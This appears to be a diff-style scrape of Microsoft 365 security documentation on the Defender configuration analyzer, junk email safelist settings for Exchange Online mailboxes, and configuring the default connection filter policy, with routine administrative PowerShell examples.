-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filters** flyout that opens:
--- **Anti-spam**-- **Anti-phishing**-- **Anti-malware**-- **Safe Attachments**-- **Safe Links**-- **ATP Built-in Protection rule**-- **DKIM**-- **Outlook**-
-When you're finished in the **Filters** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific entries.
-
-#### View details about a recommended policy setting
-
-On the **Standard protection** or **Strict protection** tab of the configuration analyzer, select an entry by clicking anywhere in the row other than the check box next to the recommendation name. In the details flyout that opens, the following information is available:
--- **Policy**: The name of the affected policy.-- **Why?**: Information about why we recommend the value for the setting.-- The specific setting to change and the value to change it to.-- **View policy**: The link takes you to the details flyout of the affected policy in the Microsoft Defender portal where you can manually update the setting.-- A link to [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).-
-> [!TIP]
-> To see details about other recommendations without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous** and **Next** at the top of the flyout.
-
-When you're finished in the details flyout, select **Close**.
--
-#### Take action on a recommended policy setting
-
-On the **Standard protection** or **Strict protection** tab of the configuration analyzer, select an entry by selecting the check box next to the recommendation name. The following actions appear on the page:
--- :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Apply recommendation**: If the recommendation requires multiple steps, this action is grayed out.-
- When you select this action, a confirmation dialog (with the option to not show the dialog again) opens. When you select **OK**, the following things happen:
-
- - The setting is updated to the recommended value.
- - The recommendation is still selected, but the only available action is :::image type="icon" source="../../media/m365-cc-sc-refresh-icon.png" border="false"::: **Refresh**.
- - The **Status** value for the row changes to **Complete**.
--- :::image type="icon" source="../../media/m365-cc-sc-view-policy-icon.png" border="false":::**View policy**: You're taken to the details flyout of the affected policy in the Microsoft Defender portal where you can manually update the setting.--- :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export**: Exports the selected recommendation to a .csv file, select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export**.-
- You can also export recommendations after you select multiple recommendations or after you select all recommendations by selecting the check box next to the **Recommendations** column header.
-
-After you automatically or manually update the setting, select :::image type="icon" source="../../media/m365-cc-sc-refresh-icon.png" border="false"::: **Refresh** to see the reduced number of recommendations and the removal of the updated row from the results.
-
-### Configuration drift analysis and history tab in the configuration analyzer
-
-> [!NOTE]
-> [Unified Auditing](/purview/audit-log-enable-disable) needs to be enabled for drift analysis.
-
-This tab allows you to track the changes to your security policies and how those changes compare to the Standard or Strict settings. By default, the following information is displayed:
--- **Last modified**-- **Modified by**-- **Setting Name**-- **Policy**: The name of the affected policy.-- **Type**: Anti-spam, Anti-phishing, Anti-malware, Safe Links, or Safe Attachments.-- **Configuration change**: The old value and the new value of the setting-- **Configuration drift**: The value **Increase** or **Decrease** that indicates the setting increased or decreased security compared to the recommended Standard or Strict setting.-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filters** flyout that opens:
--- **Date**: **Start time** and **End time**. You can go back as far as 90 days from today.-- **Type**: **Standard protection** or **Strict protection**.-
-When you're finished in the **Filters** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the ::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to filter the entries by a specific **Modified by**, **Setting name**, or **Type** value.
-
-To export the entries shown on the **Configuration drift analysis and history** tab to a .csv file, select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export**.
-
security Configure Junk Email Settings On Exo Mailboxes https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/configure-junk-email-settings-on-exo-mailboxes.md
- Title: Configure junk email settings on Exchange Online mailboxes----
- - MOE150
- - MED150
- - MBS150
- - MET150
-
- - m365-security
- - tier2
-description: Admins can learn how to configure the junk email settings in Exchange Online mailboxes. Many of these settings are available to users in Outlook or Outlook on the web.
- Previously updated : 11/28/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure junk email settings on Exchange Online mailboxes
--
-In Microsoft 365 organizations with mailboxes in Exchange Online, organizational anti-spam settings are controlled by Exchange Online Protection (EOP). For more information, see [Anti-spam protection in EOP](anti-spam-protection-about.md).
-
-But, there are also specific anti-spam settings that admins can configure on individual mailboxes in Exchange Online:
--- **Move messages to the Junk Email folder based on anti-spam policies**: When an anti-spam policy is configured with the action **Move message to Junk Email folder** for a spam filtering verdict, the message is moved to the Junk Email folder _after_ the message is delivered to the mailbox. For more information about spam filtering verdicts in anti-spam policies, see [Configure anti-spam policies in EOP](anti-spam-policies-configure.md). Similarly, if zero-hour auto purge (ZAP) determines that a delivered message is spam or phish, the message is moved to the Junk Email folder for **Move message to Junk Email folder** spam filtering verdict actions. For more information about ZAP, see [Zero-hour auto purge (ZAP) in Exchange Online](zero-hour-auto-purge.md).--- **Junk email settings that users configure for themselves in Outlook or Outlook on the web**: The _safelist collection_ is the Safe Senders list, the Safe Recipients list, and the Blocked Senders list on each mailbox. The entries in these lists determine whether the message is moved to the Inbox or the Junk Email folder. Users can configure the safelist collection for their own mailboxes in Outlook or Outlook on the web (formerly known as Outlook Web App). Admins can configure the safelist collection on any user's mailbox.-
-EOP is able to move messages to the Junk Email folder based on the spam filtering verdict action **Move message to Junk Email folder** or the Blocked Senders list on the mailbox, and prevent messages from being delivered to the Junk Email folder (based on the Safe Senders list on the mailbox).
-
-Admins can use Exchange Online PowerShell to configure entries in the safelist collection on mailboxes (the Safe Senders list, the Safe Recipients list, and the Blocked Senders list).
-
-> [!NOTE]
-> Messages from senders that users added to their own Safe Senders lists skip content filtering as part of EOP (the SCL is -1). To prevent users from adding entries to their Safe Senders list in Outlook, use Group Policy as mentioned in the [About junk email settings in Outlook](#about-junk-email-settings-in-outlook) section later in this article. Policy filtering, Content filtering, and Defender for Office 365 checks are still applied to the messages.
->
-> EOP uses its own mail flow delivery agent to route messages to the Junk Email folder instead of using the junk email rule in the mailbox. The _Enabled_ parameter on the **Set-MailboxJunkEmailConfiguration** cmdlet has no effect on mail flow for Exchange Online mailboxes. EOP routes messages based on the actions set in anti-spam policies. The user's Safe Senders list and Blocked Senders list continue to work as usual.
-
-## What do you need to know before you begin?
--- You can only use Exchange Online PowerShell to do the procedures in this article. To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions in Exchange Online before you can do the procedures in this article. Specifically, you need the **Mail Recipients** role (which is assigned to the **Organization Management**, **Recipient Management**, and **Custom Mail Recipients** role groups by default) or the **User Options** role (which is assigned to the **Organization Management** and **Help Desk** role groups by default). To add users to role groups in Exchange Online, see [Modify role groups in Exchange Online](/Exchange/permissions-exo/role-groups#modify-role-groups). Users with default permissions can do these same procedures on their own mailboxes, as long as they have [access to Exchange Online PowerShell](/powershell/exchange/disable-access-to-exchange-online-powershell).--- In hybrid environments where EOP protects on-premises Exchange mailboxes, you need to configure mail flow rules (also known as transport rules) in on-premises Exchange. These mail flow rules translate the EOP spam filtering verdict so that the junk email rule in the mailbox can move the message to the Junk Email folder. For more information, see [Configure EOP to deliver spam to the Junk Email folder in hybrid environments](/exchange/standalone-eop/configure-eop-spam-protection-hybrid). The Exchange transport rules allow a mail flow rule to be stored in the cloud.-
- > [!TIP]
- > Once the rule is stored in the cloud (after you manually create it in Microsoft 365 to match the rule in Exchange) the rule replicates in hybrid environments.
--- Safe senders for shared mailboxes aren't synchronized to Microsoft Entra ID and EOP by design.-
-## Use Exchange Online PowerShell to configure the safelist collection on a mailbox
-
-The safelist collection on a mailbox includes the Safe Senders list, the Safe Recipients list, and the Blocked Senders list. By default, users can configure the safelist collection on their own mailboxes in Outlook or Outlook on the web. Admins can use the corresponding parameters on the **Set-MailboxJunkEmailConfiguration** cmdlet to configure the safelist collection on a user's mailbox. These parameters are described in the following table.
-
-|Parameter on Set-MailboxJunkEmailConfiguration|Junk Email Options in Outlook|Junk email settings in Outlook on the web|
-||||
-|_BlockedSendersAndDomains_|**Blocked Senders** tab|**Blocked Senders and domains** section|
-|_ContactsTrusted_|**Safe Senders** tab \> **Also trust email from my Contacts**|**Filters** sections \> **Trust email from my contacts**|
-|_TrustedListsOnly_|**Options** tab \> **Safe Lists Only: Only mail from people or domains on your Safe Senders List or Safe Recipients List will be delivered to your Inbox**|**Filters** section \> **Only trust email from addresses in my Safe senders and domains list and Safe mailing lists**|
-|_TrustedSendersAndDomains_<sup>\*</sup>|**Safe Senders** tab|**Safe senders and domains** section|
-
-<sup>\*</sup> You can't directly modify the **Safe Recipients** list by using the **Set-MailboxJunkEmailConfiguration** cmdlet (the _TrustedRecipientsAndDomains_ parameter doesn't work). You modify the Safe Senders list, and those changes are synchronized to the Safe Recipients list.
-
-**Notes**:
--- In Exchange Online, whether entries in the Safe Senders list or _TrustedSendersAndDomains_ parameter work or don't work depends on the verdict and action in the policy that identified the message:
- - **Move messages to Junk Email folder**: Domain entries and sender email address entries are honored. Messages from those senders aren't moved to the Junk Email folder.
- - **Quarantine**: Domain entries aren't honored (messages from those senders are quarantined). Email address entries are honored (messages from those senders aren't quarantined) if either of the following statements is true:
- - The message isn't identified as malware or high confidence phishing (malware and high confidence phishing messages are quarantined).
- - The email address isn't in a block entry in the [Tenant Allow/Block](tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-domains-and-email-addresses).
-- In standalone EOP with directory synchronization, domain entries aren't synchronized by default, but you can enable synchronization for domains. For more information, see [Configure Content Filtering to Use Safe Domain Data: Exchange 2013 Help | Microsoft Learn](/exchange/configure-content-filtering-to-use-safe-domain-data-exchange-2013-help).-
-To configure the safelist collection on a mailbox, use the following syntax:
-
-```PowerShell
-Set-MailboxJunkEmailConfiguration <MailboxIdentity> -BlockedSendersAndDomains <EmailAddressesOrDomains | $null> -ContactsTrusted <$true | $false> -TrustedListsOnly <$true | $false> -TrustedSendersAndDomains <EmailAddresses | $null>
-```
-
-To enter multiple values and overwrite any existing entries for the _BlockedSendersAndDomains_ and _TrustedSendersAndDomains_ parameters, use the following syntax: `"<Value1>","<Value2>"...`. To add or remove one or more values without affecting other existing entries, use the following syntax: `@{Add="<Value1>","<Value2>"... ; Remove="<Value3>","<Value4>...}`
-
-The following example configures the following settings for the safelist collection on Ori Epstein's mailbox:
--- Add the value **shopping@fabrikam.com** to the Blocked Senders list.-- Remove the value **chris@fourthcoffee.com** from the Safe Senders list and the Safe Recipients list.-- Configure contacts in the Contacts folder to be treated as trusted senders.-
-```PowerShell
-Set-MailboxJunkEmailConfiguration "Ori Epstein" -BlockedSendersAndDomains @{Add="shopping@fabrikam.com"} -TrustedSendersAndDomains @{Remove="chris@fourthcoffee.com"} -ContactsTrusted $true
-```
-
-The following example removes the domain contoso.com from the Blocked Senders list in all user mailboxes in the organization:
-
-```PowerShell
-$All = Get-Mailbox -RecipientTypeDetails UserMailbox -ResultSize Unlimited; $All | foreach {Set-MailboxJunkEmailConfiguration $_.Name -BlockedSendersAndDomains @{Remove="contoso.com"}}
-```
-
-For detailed syntax and parameter information, see [Set-MailboxJunkEmailConfiguration](/powershell/module/exchange/set-mailboxjunkemailconfiguration).
-
-> [!NOTE]
-> The Outlook Junk Email Filter has additional safelist collection settings (for example, **Automatically add people I email to the Safe Senders list**). For more information, see [Use Junk Email Filters to control which messages you see](https://support.microsoft.com/office/274ae301-5db2-4aad-be21-25413cede077).
-
-### How do you know that you've successfully configured the safelist collection on a mailbox?
-
-To verify that you've successfully configured the safelist collection on a mailbox, use any of the following procedures:
--- Replace _\<MailboxIdentity\>_ with the name, alias, or email address of the mailbox, and run the following command to verify the property values:-
- ```PowerShell
- Get-MailboxJunkEmailConfiguration -Identity "<MailboxIdentity>" | Format-List trusted*,contacts*,blocked*
- ```
-
- If the list of values is too long, use this syntax:
-
- ```PowerShell
- (Get-MailboxJunkEmailConfiguration -Identity <MailboxIdentity>).BlockedSendersAndDomains
- ```
-
-## About junk email settings in Outlook
-
-To enable, disable, and configure the client-side Junk Email Filter settings that are available in Outlook, use [Group Policy](https://support.microsoft.com/help/2252421). For more information, see [Administrative Template files (ADMX/ADML) and Office Customization Tool for Microsoft 365 Apps for enterprise, Office 2019, and Office 2016](https://www.microsoft.com/download/details.aspx?id=49030).
-
-When the Outlook Junk Email Filter is set to the default value **No automatic filtering** in **Home** \> **Junk** \> **Junk E-Mail Options** \> **Options**, Outlook doesn't attempt to classify messages as spam, but still uses the safelist collection (the Safe Senders list, the Safe Recipients list, and the Blocked Senders list) to move messages to the Junk Email folder after delivery. For more information about these settings, see [Overview of the Junk Email Filter](https://support.microsoft.com/office/5ae3ea8e-cf41-4fa0-b02a-3b96e21de089).
-
-> [!NOTE]
-> In Microsoft 365 organizations, we recommend that you leave the Junk Email Filter in Outlook set to **No automatic filtering** to prevent unnecessary conflicts (both positive and negative) with the spam filtering verdicts from EOP.
-
-When the Outlook Junk Email Filter is set to **Low** or **High**, the Outlook Junk Email Filter uses its own SmartScreen filter technology to identify and move spam to the Junk Email folder. This spam classification is separate from the spam confidence level (SCL) that's determined by EOP. In fact, Outlook ignores the SCL from EOP (unless EOP marked the message to skip spam filtering) and uses its own criteria to determine whether the message is spam. Of course, it's possible that the spam verdict from EOP and Outlook might be the same. For more information about these settings, see [Change the level of protection in the Junk Email Filter](https://support.microsoft.com/office/e89c12d8-9d61-4320-8c57-d982c8d52f6b).
-
-> [!NOTE]
-> In November 2016, Microsoft stopped producing spam definition updates for the SmartScreen filters in Exchange and Outlook. The existing SmartScreen spam definitions were left in place, but their effectiveness will likely degrade over time. For more information, see [Deprecating support for SmartScreen in Outlook and Exchange](https://techcommunity.microsoft.com/t5/exchange-team-blog/deprecating-support-for-smartscreen-in-outlook-and-exchange/ba-p/605332).
-
-So, the Outlook Junk Email Filter is able to use the mailbox's safelist collection and its own spam classification to move messages to the Junk Email folder.
-
-Outlook and Outlook on the web both support the safelist collection. The safelist collection is saved in the Exchange Online mailbox so that the changes to the safelist collection in Outlook appear in Outlook on the web, and vice-versa.
-
-## Limits for junk email settings
-
-The safelist collection (the Safe Senders list, the Safe Recipients list, and the Blocked Senders list) that's stored in the user's mailbox is also synchronized to EOP. With directory synchronization, the safelist collection is synchronized to Microsoft Entra ID.
--- The safelist collection in the user's mailbox has a limit of 510 KB, which includes all lists, plus other junk email filter settings. If a user exceeds this limit, they receive an Outlook error that looks like the following message:-
- > Cannot/Unable add to the server Junk E-mail lists. You are over the size allowed on the server. The Junk E-mail filter on the server is disabled until your Junk E-mail lists have been reduced to the size allowed by the server.
-
- For more information about this limit and how to change it, see [KB2669081](https://support.microsoft.com/help/2669081).
--- The synchronized safelist collection in EOP has the following synchronization limits:
- - 1024 total entries in the Safe Senders list, the Safe Recipients list, and external contacts if **Trust email from my contacts** is enabled.
- - 500 total entries in the Blocked Senders list and the Blocked Domains list.
-
- When the 1024 entry limit is reached, the following things happen:
-
- - The list stops accepting entries in PowerShell and Outlook on the web, but no error is displayed.
-
- Outlook users can continue to add more than 1024 entries until they reach the Outlook limit of 510 KB. Outlook can use these extra entries, as long as an EOP filter doesn't block the message before delivery to the mailbox (mail flow rules, anti-spoofing, and so on).
--- With directory synchronization, the entries are synchronized to Microsoft Entra ID in the following order:
- 1. Mail contacts if **Trust email from my contacts** is enabled.
- 2. The Safe Senders list and the Safe Recipient list are combined, deduplicated, and sorted alphabetically whenever a change is made for the first 1024 entries.
-
- The first 1024 entries are used, and relevant information is stamped in the message headers.
-
- Entries over 1024 that weren't synchronized to Microsoft Entra ID are processed by Outlook (not Outlook on the web), and no information is stamped in the message headers.
-
-As you can see, enabling the **Trust email from my contacts** setting reduces the number of Safe Senders and Safe Recipients that can be synchronized. If this reduction is a concern, we recommend using Group Policy to turn off this feature:
--- File name: outlk16.opax-- Policy setting: **Trust e-mail from contacts**
security Connection Filter Policies Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/connection-filter-policies-configure.md
- Title: Configure the default connection filter policy
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn how to configure connection filtering in Exchange Online Protection (EOP) to allow or block emails from email servers.
- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure connection filtering
--
-In Microsoft 365 organizations with Exchange Online mailboxes or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, _connection filtering_ and the default connection filter policy identify good or bad source email servers by IP addresses. The key components of the default connection filter policy are:
--- **IP Allow List**: Skip spam filtering for all incoming messages from the specified source IP addresses or IP address ranges. All incoming messages are scanned for malware and high confidence phishing. For other scenarios where spam filtering still occurs on messages from servers in the IP Allow List, see the [Scenarios where messages from sources in the IP Allow List are still filtered](#scenarios-where-messages-from-sources-in-the-ip-allow-list-are-still-filtered) section later in this article. For more information about how the IP Allow List should fit into your overall safe senders strategy, see [Create safe sender lists in EOP](create-safe-sender-lists-in-office-365.md).--- **IP Block List**: Block all incoming messages from the specified source IP addresses or IP address ranges. The incoming messages are rejected, aren't marked as spam, and no other filtering occurs. For more information about how the IP Block List should fit into your overall blocked senders strategy, see [Create block sender lists in EOP](create-block-sender-lists-in-office-365.md).--- **Safe list**: The _safe list_ in the connection filter policy is a dynamic allow list that requires no customer configuration. Microsoft identifies these trusted email sources from subscriptions to various third-party lists. You enable or disable the use of the safe list; you can't configure the servers in the list. Spam filtering is skipped on incoming messages from the email servers on the safe list.-
-This article describes how to configure the default connection filter policy in the Microsoft 365 Microsoft Defender portal or in Exchange Online PowerShell. For more information about how EOP uses connection filtering is part of your organization's overall anti-spam settings, see [Anti-spam protection](anti-spam-protection-about.md).
-
-> [!NOTE]
-> The IP Allow List, safe list, and the IP Block List are one part of your overall strategy to allow or block email in your organization. For more information, see [Create safe sender lists](create-safe-sender-lists-in-office-365.md) and [Create blocked sender lists](create-block-sender-lists-in-office-365.md).
->
-> IPv6 ranges aren't supported.
->
-> Messages from blocked sources in the IP Block List aren't available in [message trace](/exchange/monitoring/trace-an-email-message/message-trace-modern-eac).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Modify policies_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to policies_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- To find the source IP addresses of the email servers (senders) that you want to allow or block, you can check the connecting IP (**CIP**) header field in the message header. To view a message header in various email clients, see [View internet message headers in Outlook](https://support.microsoft.com/office/cd039382-dc6e-4264-ac74-c048563d212c).--- The IP Allow List takes precedence over the IP Block List (an address on both lists isn't blocked).--- The IP Allow List and the IP Block List each support a maximum of 1273 entries, where an entry is a single IP address, an IP address range, or a Classless InterDomain Routing (CIDR) IP.-
-## Use the Microsoft Defender portal to modify the default connection filter policy
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-2. On the **Anti-spam policies** page, select **Connection filter policy (Default)** from the list by clicking anywhere in the row other than the check box next to the name.
-
-3. In the policy details flyout that opens, use the **Edit** links to modify the policy settings:
-
- - **Description** section: Select **Edit description** to enter a description for the policy in the **Description** box of the **Edit name and description** flyout that opens. You can't modify the name of the policy.
-
- When you're finished in the **Edit name and description** flyout, select **Save**.
-
- - **Connection filtering** section: Select **Edit connection filter policy**. In the flyout that opens, configure the following settings:
-
- - **Always allow messages from the following IP addresses or address range**: This setting is the IP Allow List. Click in the box, enter a value, and then press the ENTER key or select the complete value that's displayed below the box. Valid values are:
- - Single IP: For example, 192.168.1.1.
- - IP range: For example, 192.168.0.1-192.168.0.254.
- - CIDR IP: For example, 192.168.0.1/25. Valid subnet mask values are /24 through /32. To skip spam filtering for /1 to /23, see the [Skip spam filtering for a CIDR IP outside of the available range](#skip-spam-filtering-for-a-cidr-ip-outside-of-the-available-range) section later in this article.
-
- Repeat this step as many times as necessary. To remove an existing entry, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the entry.
-
- - **Always block messages from the following IP addresses or address range**: This setting is the IP Block List. Enter a single IP, IP range, or CIDR IP in the box as previously described in the **Always allow messages from the following IP addresses or address range** setting.
-
- - **Turn on safe list**: Enable or disable the use of the safe list to identify known, good senders that skip spam filtering. To use the safe list, select the check box.
-
- When you're finished in the flyout, select **Save**.
-
-4. Back on the policy details flyout, select **Close**.
-
-## Use the Microsoft Defender portal to view the default connection filter policy
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-On the **Anti-spam policies** page, the following properties are displayed in the list of policies:
--- **Name**: The default connection filter policy is named **Connection filter policy (Default)**.-- **Status**: The value is **Always on** for the default connection filter policy.-- **Priority**: The value is **Lowest** for the default connection filter policy.-- **Type**: The value is blank for the default connection filter policy.-
-To change the list of policies from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific policies.
-
-Select the default connection filter policy by clicking anywhere in the row other than the check box next to the name to open the details flyout for the policy.
-
-## Use Exchange Online PowerShell or standalone EOP PowerShell to modify the default connection filter policy
-
-Use the following syntax:
-
-```powershell
-Set-HostedConnectionFilterPolicy -Identity Default [-AdminDisplayName <"Optional Comment">] [-EnableSafeList <$true | $false>] [-IPAllowList <IPAddressOrRange1,IPAddressOrRange2...>] [-IPBlockList <IPAddressOrRange1,IPAddressOrRange2...>]
-```
--- Valid IP address or address range values are:
- - Single IP: For example, 192.168.1.1.
- - IP range: For example, 192.168.0.1-192.168.0.254.
- - CIDR IP: For example, 192.168.0.1/25. Valid network mask values are /24 through /32.
-- To _overwrite_ any existing entries with the values you specify, use the following syntax: `IPAddressOrRange1,IPAddressOrRange2,...,IPAddressOrRangeN`.-- To _add or remove_ IP addresses or address ranges without affecting other existing entries, use the following syntax: `@{Add="IPAddressOrRange1","IPAddressOrRange2",...,"IPAddressOrRangeN";Remove="IPAddressOrRange3","IPAddressOrRange4",...,"IPAddressOrRangeN"}`.-- To empty the IP Allow List or IP Block List, use the value `$null`.-
-This example configures the IP Allow List and the IP Block List with the specified IP addresses and address ranges.
-
-```powershell
-Set-HostedConnectionFilterPolicy -Identity Default -IPAllowList 192.168.1.10,192.168.1.23 -IPBlockList 10.10.10.0/25,172.17.17.0/24
-```
-
-This example adds and removes the specified IP addresses and address ranges from the IP Allow List.
-
-```powershell
-Set-HostedConnectionFilterPolicy -Identity Default -IPAllowList @{Add="192.168.2.10","192.169.3.0/24","192.168.4.1-192.168.4.5";Remove="192.168.1.10"}
-```
-
-For detailed syntax and parameter information, see [Set-HostedConnectionFilterPolicy](/powershell/module/exchange/set-hostedconnectionfilterpolicy).
-
-## How do you know these procedures worked?
-
-To verify that you've successfully modified the default connection filter policy, do any of the following steps:
--- On the **Anti-spam policies** page in the Microsoft Defender portal at <https://security.microsoft.com/antispam>, select **Connection filter policy (Default)** from the list by clicking anywhere in the row other than the check box next to the name, and verify the policy settings in the details flyout that opens.--- In Exchange Online PowerShell or standalone EOP PowerShell, run the following command and verify the settings:-
- ```powershell
- Get-HostedConnectionFilterPolicy -Identity Default
- ```
--- Send a test message from an entry on the IP Allow List.-
-## Additional considerations for the IP Allow List
-
-The following sections identify additional items that you need to know about when you configure the IP Allow List.
-
-> [!NOTE]
-> All incoming messages are scanned for malware and high confidence phishing, regardless of whether the message source is in the IP Allow List.
-
-### Skip spam filtering for a CIDR IP outside of the available range
-
-As described earlier in this article, you can only use a CIDR IP with the network mask /24 to /32 in the IP Allow List. To skip spam filtering on messages from source email servers in the /1 to /23 range, you need to use Exchange mail flow rules (also known as transport rules). But, we recommend that you don't use the mail flow rule method, because the messages are blocked if an IP address in the /1 to /23 CIDR IP range appears on any of Microsoft's proprietary or third-party block lists.
-
-Now that you're fully aware of the potential issues, you can create a mail flow rule with the following settings (at a minimum) to ensure that messages from these IP addresses skip spam filtering:
--- Rule condition: **Apply this rule if** \> **The sender** \> **IP address is in any of these ranges or exactly matches** \> (enter your CIDR IP with a /1 to /23 network mask).-- Rule action: **Modify the message properties** \> **Set the spam confidence level (SCL)** \> **Bypass spam filtering**.-
-You can audit the rule, test the rule, activate the rule during a specific time period, and other selections. We recommend testing the rule for a period before you enforce it. For more information, see [Manage mail flow rules in Exchange Online](/Exchange/security-and-compliance/mail-flow-rules/manage-mail-flow-rules).
-
-### Skip spam filtering on selective email domains from the same source
-
-Typically, adding an IP address or address range to the IP Allow List means you trust all incoming messages from that email source. What if that source sends email from multiple domains, and you want to skip spam filtering for some of those domains, but not others? You can use the IP Allow List in combination with a mail flow rule.
-
-For example, the source email server 192.168.1.25 sends email from the domains contoso.com, fabrikam.com, and tailspintoys.com, but you only want to skip spam filtering for messages from senders in fabrikam.com:
-
-1. Add 192.168.1.25 to the IP Allow List.
-
-2. Configure a mail flow rule with the following settings (at a minimum):
- - Rule condition: **Apply this rule if** \> **The sender** \> **IP address is in any of these ranges or exactly matches** \> 192.168.1.25 (the same IP address or address range that you added to the IP Allow List in the previous step).
- - Rule action: **Modify the message properties** \> **Set the spam confidence level (SCL)** \> **0**.
- - Rule exception: **The sender** \> **domain is** \> fabrikam.com (only the domain or domains that you want to skip spam filtering).
-
-### Scenarios where messages from sources in the IP Allow List are still filtered
-
-Messages from an email server in your IP Allow List are still subject to spam filtering in the following scenarios:
--- An IP address in your IP Allow List is also configured in an on-premises, IP-based inbound connector in _any_ tenant in Microsoft 365 (let's call this Tenant A), **and** Tenant A and the EOP server that first encounters the message both happen to be in _the same_ Active Directory forest in the Microsoft datacenters. In this scenario, **IPV:CAL** _is_ added to the message's [anti-spam message headers](message-headers-eop-mdo.md) (indicating the message bypassed spam filtering), but the message is still subject to spam filtering.--- Your tenant that contains the IP Allow List and the EOP server that first encounters the message both happen to be in _different_ Active Directory forests in the Microsoft datacenters. In this scenario, **IPV:CAL** *isn't* added to the message headers, so the message is still subject to spam filtering.-
-If you encounter either of these scenarios, you can create a mail flow rule with the following settings (at a minimum) to ensure that messages from the problematic IP addresses skip spam filtering:
--- Rule condition: **Apply this rule if** \> **The sender** \> **IP address is in any of these ranges or exactly matches** \> (your IP address or addresses).-- Rule action: **Modify the message properties** \> **Set the spam confidence level (SCL)** \> **Bypass spam filtering**.-
-## New to Microsoft 365?
-
-****
-
security Connectors Detect Respond To Compromise https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/connectors-detect-respond-to-compromise.md
- Title: Respond to a compromised connector in Microsoft 365
- - NOCSH
-----
- - m365-security
- - tier2
-
-description: Learn how to recognize and respond to a compromised connector in Microsoft 365.
- Previously updated : 6/14/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
